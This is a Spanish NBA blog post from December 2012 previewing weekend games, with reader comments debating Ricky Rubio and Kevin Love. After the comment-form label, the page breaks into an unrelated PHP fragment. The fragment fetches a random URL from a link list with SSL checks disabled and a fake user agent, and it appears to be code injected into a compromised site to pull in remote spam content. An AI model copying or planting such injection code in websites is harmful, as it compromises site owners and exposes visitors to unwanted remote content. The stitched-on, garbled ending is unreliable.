De nuevo, el fin de semana en vuestras manos

14 de December de 2012 por txusma

Seguro que os habías malacostumbrado a levantaros por la mañana y desayunar leyendo las excepcionales crónicas de Sancho pero lamentamos comunicaros que este fin de semana tendréis que volver a dar el callo. No habrá crónicas así que de vosotros depende que el blog permanezca vivo y los debates más al rojo vivo que nunca.

Vamos a echar un vistazo a lo que nos deparará estas 3 noches:

Viernes

Los Lakers se enfrentan al más difícil todavía. No puedo imaginar una plaza mejor que Washington para romper las mala racha y espantar algunos fantasmas. De todas maneras, tendrán que esforzarse en defender porque si algo falta en los Wizards es cabeza y en un partido loco puede pasar cualquier cosa. No quiero ni imaginarme que puede pasar si los Lakers vuelven a perder.

Los partidos más interesantes a priori deberían ser el Grizzlies – Nuggets y el Celtics – Rockets. Los ositos han perdido 2 partidos consecutivos y necesitan una victoria si no quieren empezar a ver como les acusan de desinflarse. El problema es que se enfrentan a un equipo con aún más necesidades que ellos. A pesar de sufrir un calendario terrible (llevan 16 partidos fuera de casa de los 23 que han jugado), Denver necesita disipar dudas sobretodo en lo que respecta a la compatibilidad entre Iguodala y Lawson. Por su parte, los Celtics van mejorando poco a poco sobretodo en el aspecto defensivo. Precisamente se enfrentan uno de los equipos que menos importancia da a la defensa por lo que habrá que comprobar cual de los equipos impondrá su estilo de juego. A Courtney Lee le espera trabajo con James Harden.

También suena bien el Philadelphia – Indiana aunque Jrue Holiday es duda.

Sábado

A Memphis le espera un partido aún más duro que el del día anterior. Visitan el EnergySolutions Arena en lo que será el partido de la jornada. Se enfrentan 2 de los juegos interiores más poderosos de la liga. Boston también tiene otro hueso duro de roer visitando San Antonio. Parece que hagan los calendarios con mala idea.

Golden State tampoco lo tendrá fácil ante Atlanta. Los de Oakland son fuertes en casa pero tienen que demostrar que fuera también pueden ganar partidos para que les tomemos en serio de verdad. Por su parte, Dallas visita Minnesota con ganas de aprovechar el mal ambiente que reina por allí. Podría reaparecer Ricky Rubio pero Kevin Love anda muy enfadado con la franquicia. Ojito que ya hay rumores de salida y jugadores que podrían interesar (Varejao).

Domingo

Lakers jugará su cuarto partido de la gira contra los Sixers. Si Irving les destrozó hace un par de días, qué no podrá hacer Jrue Holiday. De todas maneras, Howard debería destrozar el juego interior ‘sixer’ si no estuviéramos en una realidad paralela.

Los españoles podremos ver en horario mortal el Houston-Toronto. Los canadienses no interesan lo más mínimo y menos con las lesiones de Bargnani y Lowry pero nunca está de más echar un vistazo a Lin y Harden. Nos encantaría también ver a Motiejunas, Machado, Terrence Jones y Royce White pero parece que no será posible. McHale nos ha estafado…

Comenta

59 comentarios a esta entrada

  1. simon dice:
    #1

    Calderon ha empezado “on fire” ante Houston, 9 puntos 4 asistencias 2 rebotes 1 robo y 1 bloqueo en el primer cuarto.

      Citar

  2. Pikerton64 dice:
    #2

    simon:
    Melo tioa veces tienes unas recaidas que no pueden ser jejejejej.Que le falta mucho para ser un all-star es evidente, aunque yo mas bien diria que aun le falta para ser all star “a secas”. Lo que yo he dicho de que puede ser all-star mas que por nivel ( que se quedaría raspado para entrar ojo ) es tambien por su impacto y furor que hay por el en EEUU.La única laguna gorda que le veo es el tiro que no dudo que acabará formandose uno bastante decentey es “medio normal” q muchos jovenes bases lleguen con un tiro lejano bastante flojete ( Westbrook, Rondo, Rose ) por poner ejemplos de bases de los últimos años aunque ninguno tampoco sea un gran tirador en la actualidad o el mismo Jason Kidd que llegó a la liga con un tiro bastante flojete y ha terminado siendo un tirador bastante fiable. pocos jugadores ( para mi solo Paul y Rondo ( y esto sería discutible )) tienen la visión de juego y de “pasillos” que tiene Ricky y eso está mas que comprobado.
    Además es un buen defensor. Y pueden estar en los números de Paul en robos en cuanto tenga continuidad. Aparte que Ricky es un jugador que puede dominar el partido mas allá de estadisticas o puntos, no necesita sumar mucho en anotación y ni si quiera en asistencias para dominar el partido. Lo de RIcky en la NBA excede mas allá de baremos medibles, tiene un aura de algo especial que todo el mundo ve y admira a pesar de que este desacertado un dia o algo, la idolatría que tiene por el incluso las estrellas mas consumadas de la liga tienen un motivo y seguro que no es injustificado.

    Sniff sniff, Simón, me has hecho llorar, pensé que nunca leería algo así en este país. A Ricky aquí no se le quiere, y me intriga saber por qué a jugadores como Pau se les quiere tanto y a otros como Ricky se les tiene como un recelo, y así en cualquier otro deporte (Pedrosa- Lorenzo, Iniesta – Xavi…). Yo creo que es por su forma de ser, por no doblegarse a la prensa. En el caso de Ricky por ser más estadounidense que español, entiendo.

    Pero no tengo mucho más que decir. Sé que lo de Melo es su opinión, peeero. ¿Que no anota? Eso no es ser un inútil en ataque. Eso es cuestión de tener ojos para verlo y verlo. No puedo explicar como Ricky entra y los Wolves remontan, o como emociona ya no solo a la grada, sino a sus compañeros. Quizá esto no se crea si no se ven sus partidos. Prácticamente es rookie, porque el año pasado fue reducido y porque lleva 9 meses sin jugar, eso también hay que entenderlo. Insisto en que Ricky no es números, eso se lo dejo a Love, pero aún así quedar 6° en apg con el equipo que tuvo, creo que 3° en robos (tras Conley y Paul) no es moco de pavo. Rondo tenía menos tiro que Ricky, y míralo, uno de los mejores bases de la liga. La diferencia entre Europa y España es que aquí juegas en un equipo Euroliga y no puedes mejorar porque hay cuatro entrenadores por equipo y son malos, en cambio allí hay tropecientos entrenadores mejorando a los jugadores y dedicándose exclusivamente a mejorarte (véase OKC y su entrenamiento de tiro que tantísimo ha mejorado a Ibaka, y por qué no, a Harden, Westb e incluso Durant (aunque este tiene un don)).
    Los entrenadores de los Wolves (hablamos de gente como Terry Porter) mejorarán el tiro de Ricky, no hay prisa.

    En cuanto a su AllStar-idad. Aquí (España) se ha pedido ser AllStar a gente como Marc o Calde, siendo Ricky un jugador que ya se lo merece más que aquellos (y ojo que los dos que he dicho son precisamente los españoles NBA que más me gustan, tras Claver por ser valenciano, xd :). ¿Acaso merece más ser AllStar Deron, Chandler o Lin? Ricky no merece ser AllStar por hype, publicidad o gracia, sino porque su pase, como ha dicho Simón, es igualado por muy pocos jugadores en la liga, o por ninguno. Porque él, aunque los números digan lo contrario, repercute más en su equipo que el propio Love. Es que solo lo puedo explicar citando a Pep: Cuestión de feeling. Puede ser que haya entendido que Denver solo juga bien con Miller, ¿no? Pues aquí igual, aunque Faried puntúe más en la Hoops. Por ejemplo, el año pasado Lin. ¿Hypeado? Como nadie en la historia. ¿Merecido? Kniks era él (Chandler era Lin). ¿Que no era bueno? Kniks era él, repito. Ah, que en el 2K merecía baja puntuación, cierto, pero metía, pasaba, era BIG. Y mereció ir al Rising Stars.

    No soy yo un experto de la ACB, pero que Ricky aquí no jugara no dice mucho. Quiero decir, me molesta la visión de Europa respecto al baloncesto (¿hola? lo inventó norteamérica (un canadiense en EEUU)). Eso de decir que en la NBA no defienden, eso de criticar jugadores con físico, eso de que Ibaka no tenga sitio en la Selección, eso de posesiones larga y lentas, o de bases que tiran porque toca y au, no sé. Aquí la cancha es más pequeña, no hay 3 segundos en zona, según tengo entendido, Xavi Pascual es un entrenador criticado, Aíto que es primo hermano de Dios vio en Ricky a una perla y lo debutó y lo engrandeció (véase Pekín). Y lo más importante: tú das un pase behind-the-back sin mirar y a cien por hora en Europa y ni lo huelen. Lo das en EEUU y hasta los blancos lo cogen al vuelo y meten la canasta. Ese es el gran motivo de que Ricky no hiciera aquí 10apg, que los jugadores están más empanados.

    Ricky defiende como AK47 en cuanto a energía y brazos, pasa como pocos elegidos, ama y disfruta el juego, es un líder y es joven suficiente como para aprender a penetrar como Barea y tirar como Ridnour.

      Citar

  3. Pikerton64 dice:
    #3

    El quinteto Wolf, que también se mencionó, debe ser Ricky – Ridnour – AK – Love – Pek, dejando a Barea y Shved liderando el banquillo. Cuando vuelva Howard será el 3 suplente. Derrick Williams tendrá que pelear minutos con este y Cunnigham para jugar, aunque entiendo que el staff se las arreglará para sentar a Pek antes que a Love, meter a Cunnigham y luego sentar a Love y meter a D Williams. Jugaremos sin center hasta que entre Steamer o vuelva Pek. Insisto en que en la rotación natural Derrick no entra, Barea – Shved – Howard – Dante – Steamer. Así como tampoco Lee cuando vuelva o Budinger, por allá en Marzo. Pero veremos.

    En cuanto a Love, RECOMIENDO LEER. Resulta que Love le concedió una entrevista a Adrian Woj…tal, el periodista de Yahoo!, y creo que más importante de EEUU en cuanto a NBA. En ella, según, Love mostró su descontento con como había manejado la dirección de MInnesota su renovación. Él quería 5 años y el máximo, pero por lo que se ve Kahn y compañía se lo negaron, otorgándole solo 4. Es ridículo si tenemos en cuenta que Love es el mejor ala de la liga, es joven y ¡quiere quedarse en Minneapolis! Además, parece que antes que a él, la directiva estaba renovando a Ricky u ocupándose de nosequé de su contrato, siendo este bueno, sí, pero apenas empezando su contrato. Aparte de esto, creo que también criticó el movimiento de jugadores llevado a cabo por el equipo.
    Es por ello que se cree que los Wolves quieren cambiarle y están molestos mutuamente. De todos modos ayer no jugó por tener lesionado el dedo, según unos, o estar enfermo, según otros.

      Citar

  4. Ruxixón dice:
    #4

    Creo que Love también está descontento porque desde la gerencia se han puesto en duda sus lesiones,como si alargara un proceso de recuperación más de lo deseado.Yo espero que se solucione el malestar del 42 porque he de reconocer que con la magia de Ricky,el jugón de Love y ese equipo tan completo con Adelman al mando me estoy enamorando de los T’Wolves.Son algo distinto.

      Citar

  5. Denise dice:
    #5

    simon:
    Calderon ha empezado “on fire” ante Houston, 9 puntos 4 asistencias 2 rebotes 1 robo y 1 bloqueo en el primer cuarto.

    Triple doble al final 18-10-14 de Calderon y victoria ante Houston

      Citar

  6. Sempren dice:
    #6

    Acerca de Ricky y la ACB. Ojo, que el chaval también se salía en la ACB, salvo sus dos últimos años que fueron muy malos (dentro de su potencial). La dupla que formaba con Rudy era fabulosa, sus ¿dos? primeras temporadas con el Barça era el claro base titular, dominando ataque y defensa. Pero estos últimos años fueron tan malos tanto con el Barça como con la selección española, donde teóricamente sí podría dar su 100% si el problema fuesen las rotaciones, Xavi Pascual o el ambiente/presión del equipo.
    Yo creo que simplemente tuvo un gran bache, se veía superado por la situación, y quizá le faltaba la motivación que encontró en Minny, con nuevos compañeros, con una nueva afición que lo adora, etc.

    Y por cierto, claro que existen los tres segundos en zona en la ACB. Lo que no hay son los 3 segundos defensivos, pero en ataque sí. Y sí, a veces me cago en los roles prefabricados de la NBA (Rudy como tirador sin poder moverse de la esquina, por ejemplo), o en los jugadores que abusan de físico (siempre fui mucho más de Kobe que del primer LeBron, menos técnico y menos jugador que ahora), pero no todo es blanco o negro.

      Citar

  7. nba dice:
    #7

    Lo que no puede ser es que Love a estas alturas ande quejandose, ya se quejo en verano que era el unico del team-USA que no habia disputado playoffs, vale entonces, pero ahora, que la franquicia se ha rascado el bolsillo para rodearle de buenos jugadores, que prefiere? ser pagado con un contrato desorbitado como Joe Johnson o Lewis y no aspirar a nada, o tener serias opciones de disputar rondas de playoffs con garantias en años venideros, si tiene dudas de las respuestas que le pregunte a Lebron …

      Citar

  8. Pop dice:
    #8

    melo15:
    Como se motiva la gente con Ricky…
    A mi no me parece tan buen jugador y le falta muchisimo para ser un all-star, tiene unas lagunas tremendas y en ataque no vale nada. En este momento hay muchos bases mejores que el.

    Bufff, Melo, qué traspies en tu progresión. Que no te parezca tan buen jugador, correcto. Que crees la falta muchísimo para ser all-star, correcto. Que crees que tiene grandes lagunas, correcto. Que creas que hay muchos bases mejores que él, pues correcto. Todo eso lo puedes pensar y dar argumentos. Si puedes.

    Ahora lo de que “en ataque no vale nada” no tiene pase ninguno, tío. Rubio ES el ataque de los Wolves. No sé si ayer viste el partido, pero te puedo asegurar que a los 2 minutos de entrar Dallas entró EN PÁNICO porque no podían parar el vendaval de ese equipo. Pero pánico de verdad: varios cambios seguidos, rotaciones de defensores para marcarlo, tiempos muertos… Dallas ganaba como de 10 cuando entró en el primer cuartos y a los pocos minutos Minny les dio la vuelta y no estuvieron ya abajo salvo un par de minutos en el último cuarto.

    Y cuando Adelman lo metió en cancha para que se jugase los últimos 3 minutos (con empate en el marcador) la cara de agobio de los MAvericks eran para verlas.

    En cuanto a los números, que sé que te gustan, no sé si te has parado a pensar en lo que es hacer 8pts/9asistencias en 17 minutos.

    Yo creo que Ricky en forma te hace temporadas de 15pts + 13 asistencias + 2’5 robos claramente.

      Citar

  9. simon dice:
    #9

    melo15:
    Bueno ahora mismo hay bastantes Guards que le sacan un buen trecho a Ricky asi que lo del all-sta
    Ademas tu dices que Ricky no tiene buen tiro iguak que Rose o Westbrook peo no me puedes comparar la capacidad para anotar de los estos dos porque Westbrook y Rose penetran cuando quieren y como quieren.

    Claro que hay bastantes Guards mejores que Ricky pero es que Ricky no llega ni a 50 partidos en la NBA… si ya estuviera en el top 5 o top 10 sería ya la hostia con tan solo “media temporda en la liga”. Claro qu Rose y Westbrook anotan como quieren y Ricky por mucho muchisimo que mejore, NUNCA y repito NUNCA anotará a ese ritmo pero por que no es su función Melo, hará partidos en anotación bueno pero su tónica será dominar el partido al estilo que lo hacian Nash o Kidd, lo que te quiero decir es que no hace falta irse a 25 puntos por noche para dominar un partido, ni siquiera irte a 13 o 14 asistencias. El juego está muy por encima de las estadísticas. fijate en lo que te ha dicho Pop la entrada de Ricky conlleva ajustes constantes, cambios de marca, … automaticamente en el rival. Un ejemplo ( y vale que Minny del año pasado era mejor equipo en global aunque podría ser discutible porque salvo Pekovic, Barea ( tocado casi todo el año ) y Ridnour… el equipo era muy muy flojo.) pero puedes ver la marca de victorias con y sin Ricky de los Wolves y el mismo Irving con unas estadísticas brutales donde llevó a sus Cavs, ahora mismo Irving ha demostrado ser un jugadorazo con una pinta de jugón tremenda, pero no ha demostrado que pueda hacer ganar a su equipo ( aunque yo creo que lo conseguirá ) cosa que Rubio si ha demostrado en los pocos partidos que ha jugado.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>